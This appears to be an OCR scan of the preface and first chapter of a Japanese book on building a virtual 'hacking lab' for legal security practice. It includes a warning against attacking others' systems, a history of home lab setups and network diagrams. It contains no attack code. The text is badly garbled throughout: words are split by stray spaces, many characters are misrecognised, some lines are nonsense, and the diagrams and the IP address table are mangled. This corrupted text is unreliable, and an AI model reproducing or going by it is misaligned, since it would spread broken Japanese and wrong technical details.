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まえ が き 


セキ ュ リ ティ や ハッ キン グ 技 法 に 関す る 書籍 は 、 た くさ ん 出版 され て いま す 。 
し か し 、 習 得 し た ハッ キン グ を 試す 場所 は あま りあ り ま せん 。 他人 で 試す の は 
論外 で ある た め 、 自 分 の 環境 で 試す こと に な り ま す が 、 実 際 に 環境 を 構築 する 
に は 時 間 や お 金 と いっ た コス ト が か か り ま す 。 セ キュ リティ の 仕事 に 従事 し て 
いる の で あれ ば 、 手 間 を か け て 構築 する の も 仕事 の うち で し ょ う 。 一 方 、 一 般 
の 個人 に と っ て は 、 ハ ー ド ル が 高い と いえ ます 。 


これ を 解決 する 1 つの 方 法 と し て 、 仮 想 環 境 で ハッ キン グ ・ ラ ボ を 構築 する 
こと が 挙げ られ ます 。 近年 の PC は スペ ッ ク が 向上 し て お り 、 こ れ を 実現 で き 

る よう に な り ま し た 。 例え ば 、 メ イン PC 上 に て 複数 の 仮想 マシ ン を 起動 し て 、 
仮想 的 に ネッ トワ ー ク を 組み ます 。 そ の 中 で あれ ば 、 合法 的 か つ 自 由 に ハッ キ 
ング の 練習 が で きる わけ で す 。 


ハッ キン グ ・ ラ ボ の 構築 を メイ ン テ ー マ に し た 書籍 は 、 現 在 の と ころ 少な い 
と いえ ます 。 洋書 で は 数 点 あ り ま す が 、 和 書 で は ほとん ど あ り ま せん 。 それ 以 
外 の 書籍 は 、 付 録 や 1 章 分 で らい の 紙面 を 使っ て 、 タ ー ゲ ッ ト 端 末 や 攻撃 端末 
の 仮想 マシ ン を 構築 する 手順 を 解説 し て いる 程度 と いえ ます 。 


本 書 は 、 タ イト ル か ら わ か り ま す よ うに 、 ハ ッ キ ング ・ ラ ボ の 構築 を メイ ン 
に 解説 し て いま す 。 そ し て 、 ハ ッ キ ング ・ ラ ボ の 構築 の 目的 と も いえ る 、 具 体 
的 な ハッ キン グ 技 法 に つい て も 詳細 に 解説 し ます 。 仮想 環境 を 最大 限 に 活用 し 
て 、「 い つ で も どこ で も 利用 で きる ハッ キン グ ・ ラ ボ を 構築 する 」 と [ハッ キン グ ・ 
ラボ を 活用 し て ハッ キン グ の スキ ル を 習得 する ] の 2 つの テー マ を 実現 する 
と を 日 標 と し ます 。 


ハッ キン グ ・ ラ ボ の 環境 構築 に 時 間 が 取ら れ な いよ うに 、 あ ら ゆ る ノウ ハウ 
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を 本 書 に 詰め 込み まし た 。 ま た 、 ハ ッ キ ング ・ ラ ボ を 構築 で き て も 、 日 常用 途 
に 支障 が 出 て し まっ て は 意味 が あり ませ ん 。 日 常用 途 と ハッ キン グ 用 途 を 組み 
合わ せ て 、 よ り よ い PC 環境 を 構築 する こと を 目指 し ます 。 最終 的 に は 、 オ リ 
ジ ナ ル の ハッ キン グ ・ ラ ボ が 完成 し 、 外 出先 で あっ て も ハッ キン グ の スキ ル ア ッ 
プ に 精進 で きま す 。 

「 厳 客 さ きよ り わ か りや すさ 」「 体 系 的 で な く て も 即時 役立つ こと | に 配慮 し ま 
し た 。 特 に 、PC 初心 者 の 方 に 手 に 取っ て も らい た いと 思っ て いま す 。 そ し て 、 
本 書 を 通じ て ハッ キン グ や セキ ュ リ ティ に 興味 を 持つ 方 が 1 人 で も 増え て くれ 
る こと を 望み ます 。 


最後 に な り ま す が 、 本 書 の 出版 に 際 し て 、 株 式 会 社 翔 泳社 、 な ら び に 編集 者 
の 徐 和 宏 氏 に 深く 感 席 い た し ます 。 


2018 年 12 月 IPUSIRON 
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本 書 を 読む に あたっ て の 注意 事項 


本 書 で は 、 セ キュ リティ スキ ル 向 上 を 目的 と し て 、 目 分 の PC 上 に 仮 
想 環 境 を 構築 し 、 ハ ッ キ ング の 実験 を 行い ます 。 目 分 の 仮想 マシ ン や 仮 
想 的 な ネッ トワ ー ク 上 で の 実験 は 問題 あり ませ ん が 、 他 人 で 試す こと は 
絶対 に し な いで くだ さい 。 不正 ア クセ スズ 禁止 法 ( 不 止 ア クセ ス 行 為 の 禁 
止 等 に 関す る 法律 ) な ど に 抵 航 す る 菅 れ が あり ます 。 ま た 、 ワ イル スズ ス 作 
成 罪 (不正 指令 電磁 的 記録 に 関す る 罪 ) や 電子 計算 機 使用 詐欺 罪 、 電 子 
計算 機 損害 等 業務 妨 吉 罪 な ど に 該当 する 可能 性 が あり ます 。 以 下 の 点 に 
合意 し た 方 の み 本 書 を お 読み へ くだ さい 。 


》》 本 書 の 内 容 を 不正 に 利用 し な い 
》》 自分 以外 の 個人 や 組織 、 イ ン フ ラ 等 に 対し て 攻撃 実験 し な い 


》》 他人 や 所 属 組織 が 所 有する 機器 を 利用 し な い 
(自分 が 所 有する 機器 だ け を 使う ) 


町 月 店 
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ハッ キン グ ・ ラ ボ を 

も っ と 活用 し た い 方 の た め に 
追加 ペー ジ を プレ ゼン ト し ます 

本 書 を お 買い 上 げ い た だ いた 方 に 、 ペ ー ジ 数 の 都合 で 泣く 泣く カッ ト し た 内 


容 を まとめ た ファ イル (PDF 形式 、 約 70 ペー ジ ) を ダウ ン ロ ー ド 提供 いた 
し ます 。 内 容 は 以下 の 通り で す 。 


・Android の ハッ キン グ 
・ ハ ッ キ ング ・ ラ ボ に 役立つ テク ニッ クオ gg 


上 記 PDF ファ イル は 、 以 下 の サ イト か ら ダ ウン ロー ド し て 入手 いた だ け ま す 。 


翔 泳社 『 ハ ッ キ ング ・ ラ ボ の つく りか た 」 紹介 ペー ジ 
https://www.shoeisha.co.jp/book/present/9784798155302 


※ 会 員 特典 デー タ の ダウ ン ロ ー ド に は 、SHOEISHA iD ( 翔 泳社 が 運営 する 
無料 の 会 員 制 度 ) へ の 会 員 登録 が 必要 で す 。 詳し く は 、Web サイ ト を ご 覧 く 


だ さい 。 


※ 会 員 特 典 デ ー タ に 関す る 権利 は 著者 お よび 株 式 会 社 翔 泳 社 が 所 有 し て いま 
す 。 許可 な ぐ く 配布 し た り 、Web サイ ト に 転載 する こと は で きま せん 。 


※ 会 員 特 典 デ ー タ の 提供 は 予告 な く 終 了 す る こと が あり ます 。 あ ら か じ め ご 了 
承 く だ さい 、。 
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ハッ キン グ ・ ラ ボ で 
で きる こと 










ハル ハッキング ・ ラ ボ と は ハッ キン グ の た め の 実 験 環境 で す 。 ハ ッ キ シグ ・ ラ ボ 
を 構築 する た め に は 、 高価 な 器具 や 広い 部 屋 と いっ た 特別 な も の は 必要 あり ま 
せん 。 PC と イン ター ネッ ト 環 境 だ け で す 。 そ し て 、 こ れ が 一 番 重要 で す が 、 
コン ピュ ー タ に 対す る 情熱 と 好奇 心 が あ れ ば 十分 と いえ ます 。 

本 草 で は ハッ キン グ ・ ラ ボ に 関す る 概要 に つい て 紹介 し ます 。 ハ ッ キ ング ・ 
ラボ の 具体 的 な 構築 方 法 に つい て は ほ は 、 第 ら 草 以降 解説 し ます 。 本書 を 通じ て 
得 ら れ た 経験 を 活か し 、 今後 の コン ピュ ー タ ライ フ を 充実 させ る こと が で きた 
ら 本 望 で す 。 


1 眉 層 ハッ キン グ ・ ラ ボ と は 





ハッ キン グ ・ ラ ボ の 「 ラ ボ 」 と は "aboratory" の 略称 で あり 、「 実 験 室 」 | 研究 
室 ] と いっ た 意味 を 持ち ます 。 ま た 、 本 書 に お ける | ハッ キン グ 」 と いう 用 語 は 、 
コン ビュ ー タ に 対す る 攻撃 の 総称 と し て 合用 し ます ("1)。 例 えば 、 サー バー 侵入 、 
遠隔 操作 、 ネ ットワーク 盗聴 、 パ スワ ー ド 解析 な ど が 該当 し ます 。 

単純 に 訳す と 、 ハ ッ キ ング ・ ラ ボ は 「 ハ ッ キ ング の 実験 室 |】 と いう 意味 に な り 
ます 。 だ た くさ ん の PC や ネッ トワ リー ク 機 器 が 並ん で いる 部 屋 を 想像 し て し まう か も 
し れ ま せん 。 し か し な が ら 、 本 書 で いう ハッ キン グ ・ ラ ボ と は 、 そ うい っ た 物理 
りな 環境 に と ら わ れず 、 ハ ッ キ ング の 実験 を 行え る 環境 の こと で す 。 例え ば 、 次 
の ケー ス は すべ て ハッ キン グ ・ ラ ボ に 該当 し ます ( 図 1.1)。 


ケー ス 1 


部 屋 に 名 P 古 の PC が 設 設 下 さ れ て お り ヅ ト ワウ ワーク に 接続 さ さ 】 し て いる 0 


ケー ス 2 
] 台 の ノー ト PC の 上 に 、 複 数 の 仮想 マシ ン (*2) が 起動 され 、 仮 租 の ネッ トワ リー 


ク で つなが っ て いる 。 


ケー ス 3 
外出 先 か ら 和 目 宅 の LAN に 接続 し て いる 。 


*1 : ハッ キン グ の 本 来 の 定義 は 、 コ ンピュータ の 動作 を 解析 し た り 、 プ ログ ラム を 改造 ・ 改 良し 
た りす る こと で す 。 こ この 定義 で は 不正 の 用 生 は 関係 り ま せん 。 特に 、 不正 な 行為 を クラ ッ キ ン 
グ と 呼び ます が 、 現 在 で は ハッ キン グ と クラ ッ キ ング を 区 別 す る こと な く 使 用 する 場面 が 多く 
な っ て いま す 。 こ うし た 用 語 の 使わ れ 方 は 日 本 だ け で * な く 、 海外 で も 同様 で す 。 そ の た め 、 本 書 
で は 便宜 的 に クラ ッ キ ング に 相当 する 行為 を ハッ キン グ と 呼ぶ こと に し ます 


2 : 仮想 マシ ン (Virtual Machine : VM) と は 、 仮 想 的 な PC 環境 の こと で す 
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図 1-.1 本 害 に お ける ハッ キン グ ・ ラ ボ の 例 


PC が 1 人 台 し か な く て も 、 仮 想 環 境 で ネッ トワ ー ク が 組ま れ て いれ ば 、 ハ ッ キ ン 
グ の 実験 を する こと が 十分 に 可能 で す 。 端的 に いえ ば 、1 人 吾 の PC の み で あっ て も 
ハッ キン グ の 実験 は 可能 で す 。1 人 台 だ け で 、 ロ グイ ン パ スワ ー ド を 解析 し た り 、 暗 
号 ゲ デー タ を 解析 し た り で きま す 。 よ っ て 、 ハ ッ キ ング の 実験 を 行う 場 で あれ ば 、 す 
べ て ハッ キン グ ・ ラ ボ と いえ ます 。 
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1-2 | 本 書 を 読む に あたっ て 





沙 本 書 で 実現 で きる こと 
* セキ ュ リ ティ の 基礎 を 理解 で きる 。 
Pe ッ キ ング ・ ラ ボ を 構築 で きる 。 


ーー 


* すぐ に 役立つ Windows の 基本 テク ニッ ク を 身 に つけ られ る 。 


遇 ーー と 
* C 言 語 や Python な どの プロ グラ ミン グ 環 境 を 構築 で きる . 
s OS (Windows と Kali Linunx) や ネッ トワ リー ク の 知識 が 身 に つく 


e 仮想 環境 に より 、 安 全 に ハッ キン ュー ニー ンー 


s Windows、Android、Linux へ の 攻撃 手法 を 習得 で きる 
・ 無線 LAN に 対す る 攻撃 手法 (パス ワー Pe ネッ トワ ー ク 盗聴 ) を 習得 で き 
る 。 


s* Web ア プリ に 対す る 、 基 本 的 な 攻撃 手法 を 習得 で きる 。 


氷 想定 する 読者 層 


・ セ キュリ ティ の 初 学者 

s ハッ カー に あこ が れ て いる 人 

*・ CTF に 興味 が ある 人 、 ま た は 参加 し て いる 人 
・ Windows と Linux の 混在 環境 を 構築 し た い 人 
s コ ンピュータ 愛好 家 

* Linux 初心 者 


汐 前 提 知 識 

s Windows の 基本 挫 作 (ファ イル の 圧縮 ・ 解 凍 、 ア プリ の イン スト ー ル な ど ) が 
る 。 

s Linux の 基本 的 な コマ ンド を 操作 で き 2 

・ 自宅 に 小 規 模 な LAN を 構築 で きる 


や 
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1-3 バン ク ・ ラ ボ ポ の 移り 変わ り 





PC や イン ター ネッ ト の 環境 の 変化 は 、 ハ ッ キ ング に も 大 き な 影 響 を 与 を えて いま 
す 。 つ まり 、 ハ ッ キ ング を 取り 巻く 環境 が 変化 し て お り 、 同 時 に ハッ キン グ ・ ラ 
6 

ここ で は 、 簡 単に PC の 歴史 を 振り 返り な が ら 、 ど の よう に ハッ キン グ ・ ラ ボ が 
進化 し た の か に つい て 説明 し ます 。 


イン ター ネッ ト の 普及 (1995 年 一 ) 

Windows 95 の 登場 に よっ て 、 一 般 家 庭 に イン ター ネッ ト が 普及 し 始め ます 。 PC 
は 高額 で あり 、 自 宅 に ハッ キン グ ・ ラ ボ を 構築 する に は 非常 に コス ト が か か り ま 
し た 。 そ の た め 、 多 く の ア タッ カー た ち は 、 イ ンタ ーネット 上 の 他人 の PC を 攻撃 
する こと で 、 ハ ッ キ ング の スキ ル を 向上 きせ て いま し た 。 当 時 は セキ ュ リ ティ が 
非常 に 甘く 、 簡 単に 侵入 し た り 、 遠隔 探 作 し た り で きだ た の で す 。 あ る 意味 で は 、 他 
人 の PC を ハッ キン グ ・ ラ ボ の 一 部 と し て 不正 に 利用 し て いた と いえ ます 。 


自作 PC の 普及 (1998 年 一 ) 

自作 PC と は 、PC を 構成 する 部 品 (CPU、 メ モリ 、 マ ザー ボー ド 、HDD、 ケ ー 
ス な ど ) を 自分 の 好み に 組み 合わ せ た PC の こと で す 。 メー カー 製 の PC を 購入 す 
る より 、 自 作 PC の 方 が 安価 で あっ た た め 、PC 好 き に と っ て は 自作 が あたり まえ 
拓 か 姜 し だ 。 

自作 PC を 作り 続け る と 余っ た パー ツ が 出 て くる の で 、 そ れ で 別 の 1 人 台 を 組め 
よう に な り ま す 。 そ の 結果 、 自 宅 に は 複数 の PC が 揃い 、 ネ ットワーク を 組む こ 
が 目 然 な 発想 と な り ま し た 。 

また 、 余 っ た 自作 PC に Linux を イン スト ー ル し て みる と いう コン セプト か ら 、 
Linux の 特集 も 雑誌 で 取り 上 げ ら れ 始 め ま す 。 こ の 頃 か ら 、 一 般 ユ ー ザ ー に Linux 
が 普及 し 始め まし た 。 メ イン PC に Windows と Linux の 両方 を イン スト ー ル し て 
デュ アル プ ブート で きる よう に し た り 、HDD ケ ー ス を 付け 替え る こと で 起動 する 
OS を 切り 堆 え を たり と いっ た 方 法 も 一 般 化 し ます 。 

こう し た PC 環境 の 変化 に より 、 ハ ッ キ ング ・ ラ ボ も 複雑 化し まし た 。 複数 の 物 
理 PC や OS が あたり まえ と な り 、 ネ ットワーク が 組ま れる よう に な り ま し た 。 こ 
れ は ハッ キン グ ・ ラ ボ の 拡張 を 意味 し て いま す 。 


(で 
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約 常時 接続 の 普及 (2000 年 一 ) 

昔 か ら 常 時 接続 サー ビス は あり まし た が 、 非常 に 高額 で し た 。 こ の 頃 に な る と 、 
比較 的 安価 で 常時 接続 サー ビス (ADSL な ど ) に 加入 で きる よう に な り ま す 。 す る 
と 、 自 宅 に サー バー を 設置 し て 、 イ ンタ ーネット に 公開 する こと が 流行 し まし た 。 

また 、 イ ンタ ーネット 上 の Web サ ービス も 多 機 能 化 し て いき 、 今 の ブロ グ の 前 
身 と も いえ る Web ア プリ ケー ショ ン が 登場 し まし た ("3)。 こ の よう に 、 イ ンタ ー 
ネッ ト 上 の ハッ キン グ 対 象 も 多岐 に わた る よう に な り ま し た 。 

この 頃 に な る と 、 セ キュ リティ が 調 わ れる よう に な り 、2000 年 に は 不正 アク セ 
ス 禁止 法 が 施行 され ます 。 


交 無線 LAN・ 仮 想 環境 の 普及 (2005 年 一 ) 


無線 LAN の 普及 に より 、 物 理 的 な ケー ブル に 東 縛 さ れる こと な く 、 ネ ッ ト ワ ー 
ク を 構築 で きる よう に な り ま し た 。 ま た 、 小 型 の ノー ト PC が 流行 し 、 安価 で 流通 
し 始め まし た 。 結果 と し て 、 ハ ッ キ ング ・ ラ ボ の ネッ トワ ー ク が 物理 的 な 意味 で 
広がり まし た 。 

と ころ で 、 複 数 の 物理 PC が ある 場合 、 PC1 台 に 対し て モニ ター と キー ボー ド を 
接続 する と 、 場 所 を 占有 し 、 コ スト も か か り ま す 。 そ の た め 、1 組 の モニ ター と 
キー ボー ド だ け を 用 意 し て 、PC 切 堆 器 で 操作 を 切り 替え る と いう 運用 が か つて は 
採ら れ て いま し た 。 こ の 頃 に な る と 、PC の スペ ッ ク が 向上 し た こと に より 、 仮 想 
環境 が 実現 し 始め ます 。 こ れ に より 、1 人 右 の PC の 中 に 仮想 マシ ン を 作成 で きる よ 
うに な り ま し た 。 結果 と し て 、 ハ ッ キ ング ・ ラ ボ の 物理 的 な スリ ム 化 が 進み ます 。 


消 スマ ー ト フォ ン の 普及 (2010 年 一 ) 


2008 年 に は ソフ トバ ンク が 日 本 で iPhone を 発売 し 、2009 年 に は ドコ モ が 
Android 捨 載 スマ ー ト フォ ン (スマ ホ と 略す ) を 発売 し ます 。2011 年 に は KDDI が 
iPhone の 取り 扱い を 開始 し 、 2013 年 に は ドコ モ も iPhone を 取り 扱う よう に な り ま 
し た 。 そ れ に より 、 ス マ ホ は 爆発 的 に 普及 し ます 。 

スマ ホ の 普及 に より 、 PC ユー ザー 以外 も イン ター ネッ ト を 使用 する よう に な り 
まし た 。 同時 に 、Twitter や Facebook な どの SNS を 使用 する ユー ザー が 急増 し ま 


3: 多 機能 掲示 板 の phpBB、CMS (Contents Management System) の PHP-Nuke、Xoops、 
Drupal な ど が 挙げ られ ます 。 
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す 。 多く の ユー ザー が 個人 情報 を スマ ホ で 管理 し 、 そ の スマ ホ で イン ター ネッ ト 
に 接続 し て いる こと に な り ま す 。 

スマ ホ を 利用 する こと で 、 出 先 か ら イ ンタ ーネット に アク セス で きま す (%)。 
テ ザ リ ング 機能 で スマ ホ を 無線 LAN の アク セス ポイ ント (AP) に すれ ば 、PC は 
スマ ホ を 介し て イン ター ネッ ト に アク セス で きま す 。 ハ ッ キ ング ・ ラ ボ の 観点 か 
らい えば 、 出 先 か ら 自 宅 の LAN に 存在 する ハッ キン グ ・ ラ ボ に 接続 で きる こと に 
な り ま す 。 結果 と し て 、 ハ ッ キ ング ・ ラ ボ に は 、 物 理 的 な 制限 が ほとん ど な く な っ 
た と いえ ます 。 


フラ ウド スト レー ジ の 普及 (2014 年 一 ) 

クラ ウド スト レー ジ と は 、 イ ンタ ーネット 上 に ファ イル を 保存 で きる サー ビス 
で す 。 ク ラウ ドス トレ ー ジ を 提供 する サー ビス は 多々 あり ます が 、Dropbox が 特 
に 有名 で す 。2014 年 に 日 本 語 の Dropbox が 提供 きれ て いま す 。 

クラ ウド スト レー ジ の 普及 以前 で も 、 レ ンタ ル サ ー バ ー や Web ス ペー ス を 借り 
れ ば 、 そ こ に ファ イル を 保存 で きま し た 。 し か し 、 そ の た め に は ファ イル を アッ 
プロ ー ド する と いう 作業 が 必要 で す 。 一 方 、 ク ラウ ドス トレ ー ジ で は 、 ク ラウ ド 
スト レー ジ と 任意 の 端末 (PC、 ス マ ホ 、 タ ブレ ッ ト な ど ) の 間 で デー タ を 簡単 か 
つ 自 動 的 に 同期 で きま す 。 つ まり 、 ほ と ん ど 意 識 せ ず に ファ イル の バッ クア ッ プ 
を 実現 で きま す 。 

た だ し 、 ク ラウ ドス トレ ー ジ は 容量 が 限ら ちら れ て いる の で 、 動 画 な どの 大 容量 
ファ イル の 保存 場所 に は あま り 向 いて いま せん 。 こ うし た ファ イル を 端末 の 間 で 
共有 する に は 、 自 宅 の ネッ トワ ー ク に ファ イル サー バー や NAS を 設置 し て 対応 し 
ます 。 現在 販売 され て いる NAS の 場合 、 ネ ットワーク 機器 に 特別 な 設定 を する こ 
と な く 、 イ ンタ ーネット 側 か ら ア クセ ス で きる 仕組 み を 備え て いま す 。 つま り 、 外 
出先 で スマ ホ や タプ ブ プレット か ら 、 自 宅 に 保存 し た 動画 ファ イル を 再生 し て 楽し め 
ます 。 

ハッ キン グ ・ ラ ボ の 観点 か らい えば 、 ノ ー ト PC を 持た ず に 外出 し て も 、 い つも 
持ち 歩く スマ ホ を 使っ て クラ ウド スト レー ジ や NAS に アク セス する こと で 、 ハ ッ 
キン グ 用 の プロ グラ ム を 即座 に 入手 で きま す 。 


4: そ れ 以 前 か ら 、 出先 か ら イ ンタ ーネット に 接続 で きる サー ビス は 色々 あり まし た 。 し か し 、 通 
信 料 金 や 通信 スピ ー ド の 課題 が あり まし た 。 例え ば 、AirH" は 2001 年 に サー ビス を 開始 し て お 
り 、 完 全 定 額 で し た が 、32Kbps ある い は 128Kbps の 通信 スピ ー ド し か あり ませ ん で し た 。 
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化学 者 や 生物 学者 に と っ て 実験 室 は 必須 と いえ ます 。 同様 に 、 モ キュ リティ の 
専門 家 に と っ て も ハッ キン グ ・ ラ ボ は きわ め て 重要 で す 。 し か し 、 ハ ッ キ ング ・ ラ 
ボ は 専門 家 だ け の た め の も の で は あり ませ ん 。 本 書 で は 、 初 学者 に こそ ハッ キン 
グ ・ ラ ボ を 構築 し て kaederiuec 初 学者 が ハッ キン グ ・ ラ ボ を 構 
築 す る こと で 、 次 に 紹介 する 2 つの 目標 を 達成 で きる で し ょ う 。 





本 書 の 目 様 
本 書 の 主 な 目標 は 、 次 の 2 つ を 実現 する こと で す 。 


で | いつ で も 」 | と こ で も 」 利用 で きる ハッ キン グ ・ ラ ボ を 構築 する 

本 書 で は 、 主 に 仮想 環境 を 駆使 する こと で 、 メ イン PC を ベー ス に し て ハッ キン 

ラボ を 構築 し ます 。 そ の 構築 を 通じ て 、OS や ネッ トワ ー ク の 知識 を 吸収 し ま 
す 。 ネ ットワーク に 接続 する と いう だ け で な く 、 逆 に 「 制 限 す る 」 と いう 観点 を 
考え を られ る よう に な り ま す 。 ハ ッ キ ング ・ ラ ボ が ある 程度 完成 すれ ば 、 ハ ッ キ ン 
グ の 実験 の ハー ドル が 下がり 、「 い つ で も 」 ハ ッ キ ング で きま す 。 

ei * も ハッ キン グ ・ ラ ボ を 利用 で きる よう する こと で 、 | どこ で も 」 
ハッ キン グ で きま す 。 特に 、 勉強 会 や CTF に 参加 する た びに 、 持参 する ノー ト PC 
の 村 寺 拉 9 王 を 生やす ご な も な る な ゆす 


免 晶 . ハッキング ・ ラ ホ を 活用 し て 、 ハッ キン グ の スキ ル を 身 に つけ る 

ハッ キン グ ・ ラ ボ は 活用 し て こそ 意味 が あり ます 。 そ こ で 、 仮 想 環 境 の 中 で 攻 
撃 端 末 と ター ゲッ ト 端 末 を 構築 し ます 。 攻撃 と 防御 を 自分 で 体験 し て みる こと は 、 
セキ ュ リ ティ の 理解 を 深め る た め に 大 変 有効 で す 。 

ハッ キン グ を 指南 する 書籍 は 数 多く 存在 し ます が 、 そ の ハッ キン グ を 試す 環境 
の 構築 に 言及 する 書籍 は 現在 の と ころ 少な いと いえ ます 。 ハ ッ キ ング 関連 の 書籍 
を 通じ て コン ビュ ー タ に 興味 を 持っ た 若者 た ち が 、 そ の ハッ キン グ を 試し た 結果 、 
拉 捕 され て し まっ た の で は 非常 に も っ た いな いと いえ ます 。 本 書 で は 、 健 全 に 
ハッ キン グ の 実験 を 試せ る 環境 を 構築 し ます 。 
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ハッ キン グ ・ ラ ホ の 心得 
その 1 …| 日 常用 途 の PC 環境 に 悪 及 響 を 与え な いよ うに する 。 
その 2… 仮想 環境 に より 実験 対象 の 仮想 マシ ン を 削除 し た り 、 巻 き 戻 し 


た り で きる の で 、 恐 れず に いじ り 倒 せる 。 
その 3… 場所 の 制約 が な く 、 和 気軽 に ハッ キン グ を 試す 環境 を 構築 する 。 
その 4 …・ 完 届 な ハッ キン グ ・ ラ ボ は 存在 し な い 。 
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1 EE 馬 本 午 が 目指 す ハ ッ キン ク ・ ラ ボ の 構成 例 





境 は 各々 の 読者 に よ 昌 て 異な り ま す が 、 本 書 ・ 和 で は 次 の よ う な 環 環境 を 仮定 K。 
Pr 


の 目 宅 に LAN を 構 穫 て いる ゐる 。 
ER 各 端 末 (ノー ト PC、 ス マ ホ 、 タ ブレット な ど ) が 接 
聞 て さる 。 


* メ イン PC は 、 仮 想 環 境 を 利用 で きる スペ ッ ク を 備え て いる 。 


仮想 環境 を 構築 する と いう 観点 か ら は 、 ノ ー ト PC と デス クト ッ プ PC の どちら 
で も 問題 あり ませ ん 。 し か し 、 ノ ー ト PC は 外出 先 に 持ち 出せ る と いう 特徴 を 持つ 
た め 、 出 先 で ハッ キン グ ・ ラ ボ を 活用 する 場面 で 状況 が 違っ て きま す 。 


沙 メイ ン PC が ノー ト PC の 場合 


本 書 と 自身 の 構成 の 違い に つい て は 、 そ の 都度 読み 替え を て くだ さい 。 こ こ で は 

メイ ン PC に Windows 10、 仮 想 化 ソフ ト に VirtualBox を 用 い ee 1 

図 1.2 で は 、 ル ー タ ー と 無線 LAN の AP は 別に し て いま す が 、 AP が 内 蔵 さ れ た 
Wifi ル ー タ ー で も 問題 あり ませ ん 。 ま た 、 NAS が 存在 すれ ば より 便利 に な り ま す 
が 、 必 須 の 端末 と いう わけ で は あり ませ ん 。 

Raspberry Pi は 手のひら サイ ズ の コン ピュ ー タ で す 。 5 千 円 前 後 と 非常 に 安価 
で あり 、 実 験 用 の サー バー を 構築 する の に も っ て こい と いえ ます 。 仮想 環境 で 実 
現し に くい 実験 は 、 実 機 を 用 いて 対応 する こと も あり ます 。 
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イン ター ネッ ト 





図 112 ハッ キン グ ・ ラ ボ (ノー ト PC の 場合 ) 






WiFi ネ ットワーク 
ーー ヽ 
I 1 
1 I 
LU [ 
! スマ ホ タブレット! 
( し 遇 ) 
Raspberry Pi 」 
し (メイ ン PC) 1 


ーー ah デ 


ーー ーー ーー ーー ーー ーー ーー ーー ーー ーーーーーーーーー ニ ーー ーー 


仮想 ネッ トワ ー ク 


ノー ト PC で あれ ば 、 外 に 持ち 出せ ます 。 そ の ノー ト PC 内 に 仮想 環境 を 構築 し 
て いる の で 、 外 出先 で イン ター ネッ ト に 接続 し な く て も 、 仮 想 環 境 の ネッ トワ ー 


ク 内 だ け で ハッ キン グ の 実験 が で きま す ( 図 1.3) 。 


イン ター ネッ ト 





スマ ホ (AP) 


(メイ ン PC) 


ie em ニー ニー ニーー ニ ーーー ニ ーー 


図 1-3 出先 で の ハッ キン グ の 実験 (ノー ト PC の 場合 ) 
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湖 メイ ン PC が デス フト ッ プ PC の 場合 

図 14 で は 、 デ スク トッ プ PC で ある こと を 明示 する た め に 、 有 線 で LAN に 接続 
し て いま す 。 デ スク トッ プ PC で も 無線 LAN に 接続 し て いる と いう 状況 も あり え 
6 る で じょう 。 


WiFi ネ ットワーク 


上 


町 0 M 
IL om 
っ ー タ ec ピ ーーーー ーー ーーーーー ーーー ー ーーー ーー ーーーー ーー ーーー ーーー 
」 





デス クト ッ プ PC yk ロー 
(メイ ン PC) 仮想 ネッ トワ ー ク 


図 1.4 ハッ キン グ ・ ラ ボ (デス クト ッ プ PC の 場合 ) 


外出 先 で は サ プ の ノー ト PC を 用 いま す 。 し か し 、 サ プ で ある た め 、 メ イン PC 
より も スペ ッ ク が 低い か も し れ ま せん 。 ま た 、 サ プ マ シン に まで メイ ン PC と 同等 
の 環境 を 構築 する の は 、 非 常に 手間 が か か る だ け で な く 、 二 重 管理 と いう 意味 で 
も 好ま し く あ り ま せん 。 

そこ で 、 ノ フート PC を 何ら か の 方 法 で イン ター ネッ ト に 接続 し て ( 図 1.5 で は ス 
マ ホ の テ ザ リ ング を 利用 )、 自 宅 の ネッ トワ ー ク ある い は 端末 に 接続 し ます 。 本書 
で は VPN と Chrome リ モー ト デ ス クト ッ プ を 紹介 し て いま す 。YVPN を 使え ば 、 出 
先 か ら 自 宅 の LAN に 接続 で き 、LAN 内 の 端末 に アク セス で きま す 。 

LAN 内 の デス クト ッ プ PC に リモ ー ト デス クト ッ プ で ログ イン すれ ば ば 、 
Windows 10 を 遠隔 操作 で き 、 そこ で 仮想 環境 を 立ち 上 げ て ハッ キン グ の 実験 が で 
きま す 。 ま た 、Chrome リモ ー ト デス クト ッ プ を 使え ば 、 出 先 の Chrome プラ ウザ 
か ら 、LAN 内 の メイ ン PC で ある Windows 10 を 遠隔 操作 で きま す 。Chrome プラ 
ウゥ ウザ が あれ ば 接続 で きる の で 、 ス マ ホ や タプ レッ ト か ら も 操作 で きま す 。 
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図 1-5 出先 で の ハッ キン グ の 実験 (デス クト ッ プ PC の 場合 ) 


以上 より 、 出先 で も ハッ キン グ ・ ラ ボ を 活用 、 す な わ ち いつ で も どこ で も ハッ 
キン グ の 実験 を 実現 で きる こと が わか り ま し た 。 


沙 本 書 に お ける ネッ トワ ー ク 構成 の 例 


本 書 に は 様々 な 端末 が 登場 し ます 。 ネ ットワーク 構成 は 表 1-1 の よう に 設定 し ま 
す 。 IP アド レス に 関し て は 、 自 分 の 環境 に 合わ せ て 置き 換え て くだ さい 。 


表 1-1 端末 と IP アド レス 


1921681.1 | ルー ター |1O001 | ホス ト OS(Windows10) 
eieg13 。 luas liooos 
10.0.0.100 DHCP サーバ ー 
192.168.121 | サブ PC (Windows7 1000.101- |Windows1O0 SS 


記 ーー 、 ーー 衣 昌 
すま 
昨 ま 


|! 
"デニ | と 
_ 





*5 : Wi 由 i ル ー タ ー で あれ ば 、 ル ー タ ー と AP を 統合 で きま す 。 
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A や た ゴジ ルン ルレ ルカ パリ に こ 
アム 
仮想 環境 に よる 
ハッ キン ク ・ ラ ボ の 
構 箋 






ハッ キン グ ・ ラ ボ で は 、 ハ ッ キ ング を 体験 する た め に 、 攻 撃 端末 を ター ゲッ 
ト 端 末 を 用 意 す る 必要 が あり ます 。 ま た 、 安全 性 を 考慮 し て 、 独 立 し た ネッ ト 
ワー ク を 用 意 す べき で す 。 テン 
本 草 で は 、 メ イン マシ ン に VirtualBox を 導入 し 、 ハ ッ キ ング ・ ラ ボ の ネッ 。 生 
トワ ー ク を 構築 し ます 。 そし て 、 攻撃 端末 と し で Kali Linux の 仮想 マシ ン を 作 
成 し て 、 Kali Linux の 基本 的 操作 を 習得 し ます 。 ウー ゲッ ト 端 末 の 作成 と ハッ 
キン グ の 実践 に つい て は 、 第 4 音 以 降 で 解説 し ま 邊 。 
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氷 仮想 (E 上 と は 

仮想 化 と は 、 実 際 に は 限ら れ た 数 し か な いも の を 、 あ た か も それ 以上 の 数 が あ 
る か の よう に 見 せる 技術 の こと で す 。 

